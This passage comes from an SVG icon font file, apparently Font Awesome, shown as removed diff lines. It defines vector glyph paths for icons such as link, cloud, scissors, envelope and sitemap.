-<glyph unicode="&#xf0c1;" horiz-adv-x="1664" d="M1456 320q0 40 -28 68l-208 208q-28 28 -68 28q-42 0 -72 -32q3 -3 19 -18.5t21.5 -21.5t15 -19t13 -25.5t3.5 -27.5q0 -40 -28 -68t-68 -28q-15 0 -27.5 3.5t-25.5 13t-19 15t-21.5 21.5t-18.5 19q-33 -31 -33 -73q0 -40 28 -68l206 -207q27 -27 68 -27q40 0 68 26 l147 146q28 28 28 67zM753 1025q0 40 -28 68l-206 207q-28 28 -68 28q-39 0 -68 -27l-147 -146q-28 -28 -28 -67q0 -40 28 -68l208 -208q27 -27 68 -27q42 0 72 31q-3 3 -19 18.5t-21.5 21.5t-15 19t-13 25.5t-3.5 27.5q0 40 28 68t68 28q15 0 27.5 -3.5t25.5 -13t19 -15 t21.5 -21.5t18.5 -19q33 31 33 73zM1648 320q0 -120 -85 -203l-147 -146q-83 -83 -203 -83q-121 0 -204 85l-206 207q-83 83 -83 203q0 123 88 209l-88 88q-86 -88 -208 -88q-120 0 -204 84l-208 208q-84 84 -84 204t85 203l147 146q83 83 203 83q121 0 204 -85l206 -207 q83 -83 83 -203q0 -123 -88 -209l88 -88q86 88 208 88q120 0 204 -84l208 -208q84 -84 84 -204z" />
-<glyph unicode="&#xf0c2;" horiz-adv-x="1920" d="M1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088q-185 0 -316.5 131.5t-131.5 316.5q0 132 71 241.5t187 163.5q-2 28 -2 43q0 212 150 362t362 150q158 0 286.5 -88t187.5 -230q70 62 166 62q106 0 181 -75t75 -181q0 -75 -41 -138q129 -30 213 -134.5t84 -239.5z " />
-<glyph unicode="&#xf0c3;" horiz-adv-x="1664" d="M1527 88q56 -89 21.5 -152.5t-140.5 -63.5h-1152q-106 0 -140.5 63.5t21.5 152.5l503 793v399h-64q-26 0 -45 19t-19 45t19 45t45 19h512q26 0 45 -19t19 -45t-19 -45t-45 -19h-64v-399zM748 813l-272 -429h712l-272 429l-20 31v37v399h-128v-399v-37z" />
-<glyph unicode="&#xf0c4;" horiz-adv-x="1792" d="M960 640q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1260 576l507 -398q28 -20 25 -56q-5 -35 -35 -51l-128 -64q-13 -7 -29 -7q-17 0 -31 8l-690 387l-110 -66q-8 -4 -12 -5q14 -49 10 -97q-7 -77 -56 -147.5t-132 -123.5q-132 -84 -277 -84 q-136 0 -222 78q-90 84 -79 207q7 76 56 147t131 124q132 84 278 84q83 0 151 -31q9 13 22 22l122 73l-122 73q-13 9 -22 22q-68 -31 -151 -31q-146 0 -278 84q-82 53 -131 124t-56 147q-5 59 15.5 113t63.5 93q85 79 222 79q145 0 277 -84q83 -52 132 -123t56 -148 q4 -48 -10 -97q4 -1 12 -5l110 -66l690 387q14 8 31 8q16 0 29 -7l128 -64q30 -16 35 -51q3 -36 -25 -56zM579 836q46 42 21 108t-106 117q-92 59 -192 59q-74 0 -113 -36q-46 -42 -21 -108t106 -117q92 -59 192 -59q74 0 113 36zM494 91q81 51 106 117t-21 108 q-39 36 -113 36q-100 0 -192 -59q-81 -51 -106 -117t21 -108q39 -36 113 -36q100 0 192 59zM672 704l96 -58v11q0 36 33 56l14 8l-79 47l-26 -26q-3 -3 -10 -11t-12 -12q-2 -2 -4 -3.5t-3 -2.5zM896 480l96 -32l736 576l-128 64l-768 -431v-113l-160 -96l9 -8q2 -2 7 -6 q4 -4 11 -12t11 -12l26 -26zM1600 64l128 64l-520 408l-177 -138q-2 -3 -13 -7z" />
-<glyph unicode="&#xf0c5;" horiz-adv-x="1792" d="M1696 1152q40 0 68 -28t28 -68v-1216q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v288h-544q-40 0 -68 28t-28 68v672q0 40 20 88t48 76l408 408q28 28 76 48t88 20h416q40 0 68 -28t28 -68v-328q68 40 128 40h416zM1152 939l-299 -299h299v299zM512 1323l-299 -299 h299v299zM708 676l316 316v416h-384v-416q0 -40 -28 -68t-68 -28h-416v-640h512v256q0 40 20 88t48 76zM1664 -128v1152h-384v-416q0 -40 -28 -68t-68 -28h-416v-640h896z" />
-<glyph unicode="&#xf0c6;" horiz-adv-x="1408" d="M1404 151q0 -117 -79 -196t-196 -79q-135 0 -235 100l-777 776q-113 115 -113 271q0 159 110 270t269 111q158 0 273 -113l605 -606q10 -10 10 -22q0 -16 -30.5 -46.5t-46.5 -30.5q-13 0 -23 10l-606 607q-79 77 -181 77q-106 0 -179 -75t-73 -181q0 -105 76 -181 l776 -777q63 -63 145 -63q64 0 106 42t42 106q0 82 -63 145l-581 581q-26 24 -60 24q-29 0 -48 -19t-19 -48q0 -32 25 -59l410 -410q10 -10 10 -22q0 -16 -31 -47t-47 -31q-12 0 -22 10l-410 410q-63 61 -63 149q0 82 57 139t139 57q88 0 149 -63l581 -581q100 -98 100 -235 z" />
-<glyph unicode="&#xf0c7;" d="M384 0h768v384h-768v-384zM1280 0h128v896q0 14 -10 38.5t-20 34.5l-281 281q-10 10 -34 20t-39 10v-416q0 -40 -28 -68t-68 -28h-576q-40 0 -68 28t-28 68v416h-128v-1280h128v416q0 40 28 68t68 28h832q40 0 68 -28t28 -68v-416zM896 928v320q0 13 -9.5 22.5t-22.5 9.5 h-192q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 22.5zM1536 896v-928q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h928q40 0 88 -20t76 -48l280 -280q28 -28 48 -76t20 -88z" />
-<glyph unicode="&#xf0c8;" d="M1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf0c9;" d="M1536 192v-128q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1536 704v-128q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1536 1216v-128q0 -26 -19 -45 t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0ca;" horiz-adv-x="1792" d="M384 128q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM384 640q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5 t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5zM384 1152q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1792 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z M1792 1248v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z" />
-<glyph unicode="&#xf0cb;" horiz-adv-x="1792" d="M381 -84q0 -80 -54.5 -126t-135.5 -46q-106 0 -172 66l57 88q49 -45 106 -45q29 0 50.5 14.5t21.5 42.5q0 64 -105 56l-26 56q8 10 32.5 43.5t42.5 54t37 38.5v1q-16 0 -48.5 -1t-48.5 -1v-53h-106v152h333v-88l-95 -115q51 -12 81 -49t30 -88zM383 543v-159h-362 q-6 36 -6 54q0 51 23.5 93t56.5 68t66 47.5t56.5 43.5t23.5 45q0 25 -14.5 38.5t-39.5 13.5q-46 0 -81 -58l-85 59q24 51 71.5 79.5t105.5 28.5q73 0 123 -41.5t50 -112.5q0 -50 -34 -91.5t-75 -64.5t-75.5 -50.5t-35.5 -52.5h127v60h105zM1792 224v-192q0 -13 -9.5 -22.5 t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 14 9 23t23 9h1216q13 0 22.5 -9.5t9.5 -22.5zM384 1123v-99h-335v99h107q0 41 0.5 122t0.5 121v12h-2q-8 -17 -50 -54l-71 76l136 127h106v-404h108zM1792 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5 t-9.5 22.5v192q0 14 9 23t23 9h1216q13 0 22.5 -9.5t9.5 -22.5zM1792 1248v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z" />
-<glyph unicode="&#xf0cc;" horiz-adv-x="1792" d="M1760 640q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1728q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h1728zM483 704q-28 35 -51 80q-48 97 -48 188q0 181 134 309q133 127 393 127q50 0 167 -19q66 -12 177 -48q10 -38 21 -118q14 -123 14 -183q0 -18 -5 -45l-12 -3l-84 6 l-14 2q-50 149 -103 205q-88 91 -210 91q-114 0 -182 -59q-67 -58 -67 -146q0 -73 66 -140t279 -129q69 -20 173 -66q58 -28 95 -52h-743zM990 448h411q7 -39 7 -92q0 -111 -41 -212q-23 -55 -71 -104q-37 -35 -109 -81q-80 -48 -153 -66q-80 -21 -203 -21q-114 0 -195 23 l-140 40q-57 16 -72 28q-8 8 -8 22v13q0 108 -2 156q-1 30 0 68l2 37v44l102 2q15 -34 30 -71t22.5 -56t12.5 -27q35 -57 80 -94q43 -36 105 -57q59 -22 132 -22q64 0 139 27q77 26 122 86q47 61 47 129q0 84 -81 157q-34 29 -137 71z" />
-<glyph unicode="&#xf0cd;" d="M48 1313q-37 2 -45 4l-3 88q13 1 40 1q60 0 112 -4q132 -7 166 -7q86 0 168 3q116 4 146 5q56 0 86 2l-1 -14l2 -64v-9q-60 -9 -124 -9q-60 0 -79 -25q-13 -14 -13 -132q0 -13 0.5 -32.5t0.5 -25.5l1 -229l14 -280q6 -124 51 -202q35 -59 96 -92q88 -47 177 -47 q104 0 191 28q56 18 99 51q48 36 65 64q36 56 53 114q21 73 21 229q0 79 -3.5 128t-11 122.5t-13.5 159.5l-4 59q-5 67 -24 88q-34 35 -77 34l-100 -2l-14 3l2 86h84l205 -10q76 -3 196 10l18 -2q6 -38 6 -51q0 -7 -4 -31q-45 -12 -84 -13q-73 -11 -79 -17q-15 -15 -15 -41 q0 -7 1.5 -27t1.5 -31q8 -19 22 -396q6 -195 -15 -304q-15 -76 -41 -122q-38 -65 -112 -123q-75 -57 -182 -89q-109 -33 -255 -33q-167 0 -284 46q-119 47 -179 122q-61 76 -83 195q-16 80 -16 237v333q0 188 -17 213q-25 36 -147 39zM1536 -96v64q0 14 -9 23t-23 9h-1472 q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h1472q14 0 23 9t9 23z" />
-<glyph unicode="&#xf0ce;" horiz-adv-x="1664" d="M512 160v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM512 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 160v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23 v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM512 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 160v192 q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192 q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1664 1248v-1088q0 -66 -47 -113t-113 -47h-1344q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1344q66 0 113 -47t47 -113 z" />
-<glyph unicode="&#xf0d0;" horiz-adv-x="1664" d="M1190 955l293 293l-107 107l-293 -293zM1637 1248q0 -27 -18 -45l-1286 -1286q-18 -18 -45 -18t-45 18l-198 198q-18 18 -18 45t18 45l1286 1286q18 18 45 18t45 -18l198 -198q18 -18 18 -45zM286 1438l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98zM636 1276 l196 -60l-196 -60l-60 -196l-60 196l-196 60l196 60l60 196zM1566 798l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98zM926 1438l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98z" />
-<glyph unicode="&#xf0d1;" horiz-adv-x="1792" d="M640 128q0 52 -38 90t-90 38t-90 -38t-38 -90t38 -90t90 -38t90 38t38 90zM256 640h384v256h-158q-13 0 -22 -9l-195 -195q-9 -9 -9 -22v-30zM1536 128q0 52 -38 90t-90 38t-90 -38t-38 -90t38 -90t90 -38t90 38t38 90zM1792 1216v-1024q0 -15 -4 -26.5t-13.5 -18.5 t-16.5 -11.5t-23.5 -6t-22.5 -2t-25.5 0t-22.5 0.5q0 -106 -75 -181t-181 -75t-181 75t-75 181h-384q0 -106 -75 -181t-181 -75t-181 75t-75 181h-64q-3 0 -22.5 -0.5t-25.5 0t-22.5 2t-23.5 6t-16.5 11.5t-13.5 18.5t-4 26.5q0 26 19 45t45 19v320q0 8 -0.5 35t0 38 t2.5 34.5t6.5 37t14 30.5t22.5 30l198 198q19 19 50.5 32t58.5 13h160v192q0 26 19 45t45 19h1024q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0d2;" d="M1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103q-111 0 -218 32q59 93 78 164q9 34 54 211q20 -39 73 -67.5t114 -28.5q121 0 216 68.5t147 188.5t52 270q0 114 -59.5 214t-172.5 163t-255 63q-105 0 -196 -29t-154.5 -77t-109 -110.5t-67 -129.5t-21.5 -134 q0 -104 40 -183t117 -111q30 -12 38 20q2 7 8 31t8 30q6 23 -11 43q-51 61 -51 151q0 151 104.5 259.5t273.5 108.5q151 0 235.5 -82t84.5 -213q0 -170 -68.5 -289t-175.5 -119q-61 0 -98 43.5t-23 104.5q8 35 26.5 93.5t30 103t11.5 75.5q0 50 -27 83t-77 33 q-62 0 -105 -57t-43 -142q0 -73 25 -122l-99 -418q-17 -70 -13 -177q-206 91 -333 281t-127 423q0 209 103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf0d3;" d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-725q85 122 108 210q9 34 53 209q21 -39 73.5 -67t112.5 -28q181 0 295.5 147.5t114.5 373.5q0 84 -35 162.5t-96.5 139t-152.5 97t-197 36.5q-104 0 -194.5 -28.5t-153 -76.5 t-107.5 -109.5t-66.5 -128t-21.5 -132.5q0 -102 39.5 -180t116.5 -110q13 -5 23.5 0t14.5 19q10 44 15 61q6 23 -11 42q-50 62 -50 150q0 150 103.5 256.5t270.5 106.5q149 0 232.5 -81t83.5 -210q0 -168 -67.5 -286t-173.5 -118q-60 0 -97 43.5t-23 103.5q8 34 26.5 92.5 t29.5 102t11 74.5q0 49 -26.5 81.5t-75.5 32.5q-61 0 -103.5 -56.5t-42.5 -139.5q0 -72 24 -121l-98 -414q-24 -100 -7 -254h-183q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960z" />
-<glyph unicode="&#xf0d4;" d="M678 -57q0 -38 -10 -71h-380q-95 0 -171.5 56.5t-103.5 147.5q24 45 69 77.5t100 49.5t107 24t107 7q32 0 49 -2q6 -4 30.5 -21t33 -23t31 -23t32 -25.5t27.5 -25.5t26.5 -29.5t21 -30.5t17.5 -34.5t9.5 -36t4.5 -40.5zM385 294q-234 -7 -385 -85v433q103 -118 273 -118 q32 0 70 5q-21 -61 -21 -86q0 -67 63 -149zM558 805q0 -100 -43.5 -160.5t-140.5 -60.5q-51 0 -97 26t-78 67.5t-56 93.5t-35.5 104t-11.5 99q0 96 51.5 165t144.5 69q66 0 119 -41t84 -104t47 -130t16 -128zM1536 896v-736q0 -119 -84.5 -203.5t-203.5 -84.5h-468 q39 73 39 157q0 66 -22 122.5t-55.5 93t-72 71t-72 59.5t-55.5 54.5t-22 59.5q0 36 23 68t56 61.5t65.5 64.5t55.5 93t23 131t-26.5 145.5t-75.5 118.5q-6 6 -14 11t-12.5 7.5t-10 9.5t-10.5 17h135l135 64h-437q-138 0 -244.5 -38.5t-182.5 -133.5q0 126 81 213t207 87h960 q119 0 203.5 -84.5t84.5 -203.5v-96h-256v256h-128v-256h-256v-128h256v-256h128v256h256z" />
-<glyph unicode="&#xf0d5;" horiz-adv-x="1664" d="M876 71q0 21 -4.5 40.5t-9.5 36t-17.5 34.5t-21 30.5t-26.5 29.5t-27.5 25.5t-32 25.5t-31 23t-33 23t-30.5 21q-17 2 -50 2q-54 0 -106 -7t-108 -25t-98 -46t-69 -75t-27 -107q0 -68 35.5 -121.5t93 -84t120.5 -45.5t127 -15q59 0 112.5 12.5t100.5 39t74.5 73.5 t27.5 110zM756 933q0 60 -16.5 127.5t-47 130.5t-84 104t-119.5 41q-93 0 -144 -69t-51 -165q0 -47 11.5 -99t35.5 -104t56 -93.5t78 -67.5t97 -26q97 0 140.5 60.5t43.5 160.5zM625 1408h437l-135 -79h-135q71 -45 110 -126t39 -169q0 -74 -23 -131.5t-56 -92.5t-66 -64.5 t-56 -61t-23 -67.5q0 -26 16.5 -51t43 -48t58.5 -48t64 -55.5t58.5 -66t43 -85t16.5 -106.5q0 -160 -140 -282q-152 -131 -420 -131q-59 0 -119.5 10t-122 33.5t-108.5 58t-77 89t-30 121.5q0 61 37 135q32 64 96 110.5t145 71t155 36t150 13.5q-64 83 -64 149q0 12 2 23.5 t5 19.5t8 21.5t7 21.5q-40 -5 -70 -5q-149 0 -255.5 98t-106.5 246q0 140 95 250.5t234 141.5q94 20 187 20zM1664 1152v-128h-256v-256h-128v256h-256v128h256v256h128v-256h256z" />
-<glyph unicode="&#xf0d6;" horiz-adv-x="1920" d="M768 384h384v96h-128v448h-114l-148 -137l77 -80q42 37 55 57h2v-288h-128v-96zM1280 640q0 -70 -21 -142t-59.5 -134t-101.5 -101t-138 -39t-138 39t-101.5 101t-59.5 134t-21 142t21 142t59.5 134t101.5 101t138 39t138 -39t101.5 -101t59.5 -134t21 -142zM1792 384 v512q-106 0 -181 75t-75 181h-1152q0 -106 -75 -181t-181 -75v-512q106 0 181 -75t75 -181h1152q0 106 75 181t181 75zM1920 1216v-1152q0 -26 -19 -45t-45 -19h-1792q-26 0 -45 19t-19 45v1152q0 26 19 45t45 19h1792q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0d7;" horiz-adv-x="1024" d="M1024 832q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0d8;" horiz-adv-x="1024" d="M1024 320q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
-<glyph unicode="&#xf0d9;" horiz-adv-x="640" d="M640 1088v-896q0 -26 -19 -45t-45 -19t-45 19l-448 448q-19 19 -19 45t19 45l448 448q19 19 45 19t45 -19t19 -45z" />
-<glyph unicode="&#xf0da;" horiz-adv-x="640" d="M576 640q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19t-19 45v896q0 26 19 45t45 19t45 -19l448 -448q19 -19 19 -45z" />
-<glyph unicode="&#xf0db;" horiz-adv-x="1664" d="M160 0h608v1152h-640v-1120q0 -13 9.5 -22.5t22.5 -9.5zM1536 32v1120h-640v-1152h608q13 0 22.5 9.5t9.5 22.5zM1664 1248v-1216q0 -66 -47 -113t-113 -47h-1344q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1344q66 0 113 -47t47 -113z" />
-<glyph unicode="&#xf0dc;" horiz-adv-x="1024" d="M1024 448q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45zM1024 832q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
-<glyph unicode="&#xf0dd;" horiz-adv-x="1024" d="M1024 448q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf0de;" horiz-adv-x="1024" d="M1024 832q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
-<glyph unicode="&#xf0e0;" horiz-adv-x="1792" d="M1792 826v-794q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v794q44 -49 101 -87q362 -246 497 -345q57 -42 92.5 -65.5t94.5 -48t110 -24.5h1h1q51 0 110 24.5t94.5 48t92.5 65.5q170 123 498 345q57 39 100 87zM1792 1120q0 -79 -49 -151t-122 -123 q-376 -261 -468 -325q-10 -7 -42.5 -30.5t-54 -38t-52 -32.5t-57.5 -27t-50 -9h-1h-1q-23 0 -50 9t-57.5 27t-52 32.5t-54 38t-42.5 30.5q-91 64 -262 182.5t-205 142.5q-62 42 -117 115.5t-55 136.5q0 78 41.5 130t118.5 52h1472q65 0 112.5 -47t47.5 -113z" />
-<glyph unicode="&#xf0e1;" d="M349 911v-991h-330v991h330zM370 1217q1 -73 -50.5 -122t-135.5 -49h-2q-82 0 -132 49t-50 122q0 74 51.5 122.5t134.5 48.5t133 -48.5t51 -122.5zM1536 488v-568h-329v530q0 105 -40.5 164.5t-126.5 59.5q-63 0 -105.5 -34.5t-63.5 -85.5q-11 -30 -11 -81v-553h-329 q2 399 2 647t-1 296l-1 48h329v-144h-2q20 32 41 56t56.5 52t87 43.5t114.5 15.5q171 0 275 -113.5t104 -332.5z" />
-<glyph unicode="&#xf0e2;" d="M1536 640q0 -156 -61 -298t-164 -245t-245 -164t-298 -61q-172 0 -327 72.5t-264 204.5q-7 10 -6.5 22.5t8.5 20.5l137 138q10 9 25 9q16 -2 23 -12q73 -95 179 -147t225 -52q104 0 198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5t-40.5 198.5t-109.5 163.5 t-163.5 109.5t-198.5 40.5q-98 0 -188 -35.5t-160 -101.5l137 -138q31 -30 14 -69q-17 -40 -59 -40h-448q-26 0 -45 19t-19 45v448q0 42 40 59q39 17 69 -14l130 -129q107 101 244.5 156.5t284.5 55.5q156 0 298 -61t245 -164t164 -245t61 -298z" />
-<glyph unicode="&#xf0e3;" horiz-adv-x="1792" d="M1771 0q0 -53 -37 -90l-107 -108q-39 -37 -91 -37q-53 0 -90 37l-363 364q-38 36 -38 90q0 53 43 96l-256 256l-126 -126q-14 -14 -34 -14t-34 14q2 -2 12.5 -12t12.5 -13t10 -11.5t10 -13.5t6 -13.5t5.5 -16.5t1.5 -18q0 -38 -28 -68q-3 -3 -16.5 -18t-19 -20.5 t-18.5 -16.5t-22 -15.5t-22 -9t-26 -4.5q-40 0 -68 28l-408 408q-28 28 -28 68q0 13 4.5 26t9 22t15.5 22t16.5 18.5t20.5 19t18 16.5q30 28 68 28q10 0 18 -1.5t16.5 -5.5t13.5 -6t13.5 -10t11.5 -10t13 -12.5t12 -12.5q-14 14 -14 34t14 34l348 348q14 14 34 14t34 -14 q-2 2 -12.5 12t-12.5 13t-10 11.5t-10 13.5t-6 13.5t-5.5 16.5t-1.5 18q0 38 28 68q3 3 16.5 18t19 20.5t18.5 16.5t22 15.5t22 9t26 4.5q40 0 68 -28l408 -408q28 -28 28 -68q0 -13 -4.5 -26t-9 -22t-15.5 -22t-16.5 -18.5t-20.5 -19t-18 -16.5q-30 -28 -68 -28 q-10 0 -18 1.5t-16.5 5.5t-13.5 6t-13.5 10t-11.5 10t-13 12.5t-12 12.5q14 -14 14 -34t-14 -34l-126 -126l256 -256q43 43 96 43q52 0 91 -37l363 -363q37 -39 37 -91z" />
-<glyph unicode="&#xf0e4;" horiz-adv-x="1792" d="M384 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM576 832q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1004 351l101 382q6 26 -7.5 48.5t-38.5 29.5 t-48 -6.5t-30 -39.5l-101 -382q-60 -5 -107 -43.5t-63 -98.5q-20 -77 20 -146t117 -89t146 20t89 117q16 60 -6 117t-72 91zM1664 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1024 1024q0 53 -37.5 90.5 t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1472 832q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1792 384q0 -261 -141 -483q-19 -29 -54 -29h-1402q-35 0 -54 29 q-141 221 -141 483q0 182 71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
-<glyph unicode="&#xf0e5;" horiz-adv-x="1792" d="M896 1152q-204 0 -381.5 -69.5t-282 -187.5t-104.5 -255q0 -112 71.5 -213.5t201.5 -175.5l87 -50l-27 -96q-24 -91 -70 -172q152 63 275 171l43 38l57 -6q69 -8 130 -8q204 0 381.5 69.5t282 187.5t104.5 255t-104.5 255t-282 187.5t-381.5 69.5zM1792 640 q0 -174 -120 -321.5t-326 -233t-450 -85.5q-70 0 -145 8q-198 -175 -460 -242q-49 -14 -114 -22h-5q-15 0 -27 10.5t-16 27.5v1q-3 4 -0.5 12t2 10t4.5 9.5l6 9t7 8.5t8 9q7 8 31 34.5t34.5 38t31 39.5t32.5 51t27 59t26 76q-157 89 -247.5 220t-90.5 281q0 174 120 321.5 t326 233t450 85.5t450 -85.5t326 -233t120 -321.5z" />
-<glyph unicode="&#xf0e6;" horiz-adv-x="1792" d="M704 1152q-153 0 -286 -52t-211.5 -141t-78.5 -191q0 -82 53 -158t149 -132l97 -56l-35 -84q34 20 62 39l44 31l53 -10q78 -14 153 -14q153 0 286 52t211.5 141t78.5 191t-78.5 191t-211.5 141t-286 52zM704 1280q191 0 353.5 -68.5t256.5 -186.5t94 -257t-94 -257 t-256.5 -186.5t-353.5 -68.5q-86 0 -176 16q-124 -88 -278 -128q-36 -9 -86 -16h-3q-11 0 -20.5 8t-11.5 21q-1 3 -1 6.5t0.5 6.5t2 6l2.5 5t3.5 5.5t4 5t4.5 5t4 4.5q5 6 23 25t26 29.5t22.5 29t25 38.5t20.5 44q-124 72 -195 177t-71 224q0 139 94 257t256.5 186.5 t353.5 68.5zM1526 111q10 -24 20.5 -44t25 -38.5t22.5 -29t26 -29.5t23 -25q1 -1 4 -4.5t4.5 -5t4 -5t3.5 -5.5l2.5 -5t2 -6t0.5 -6.5t-1 -6.5q-3 -14 -13 -22t-22 -7q-50 7 -86 16q-154 40 -278 128q-90 -16 -176 -16q-271 0 -472 132q58 -4 88 -4q161 0 309 45t264 129 q125 92 192 212t67 254q0 77 -23 152q129 -71 204 -178t75 -230q0 -120 -71 -224.5t-195 -176.5z" />
-<glyph unicode="&#xf0e7;" horiz-adv-x="896" d="M885 970q18 -20 7 -44l-540 -1157q-13 -25 -42 -25q-4 0 -14 2q-17 5 -25.5 19t-4.5 30l197 808l-406 -101q-4 -1 -12 -1q-18 0 -31 11q-18 15 -13 39l201 825q4 14 16 23t28 9h328q19 0 32 -12.5t13 -29.5q0 -8 -5 -18l-171 -463l396 98q8 2 12 2q19 0 34 -15z" />
-<glyph unicode="&#xf0e8;" horiz-adv-x="1792" d="M1792 288v-320q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192h-512v-192h96q40 0 68 -28t28 -68v-320q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192h-512v-192h96q40 0 68 -28t28 -68v-320 q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192q0 52 38 90t90 38h512v192h-96q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h320q40 0 68 -28t28 -68v-320q0 -40 -28 -68t-68 -28h-96v-192h512q52 0 90 -38t38 -90v-192h96q40 0 68 -28t28 -68 z" />
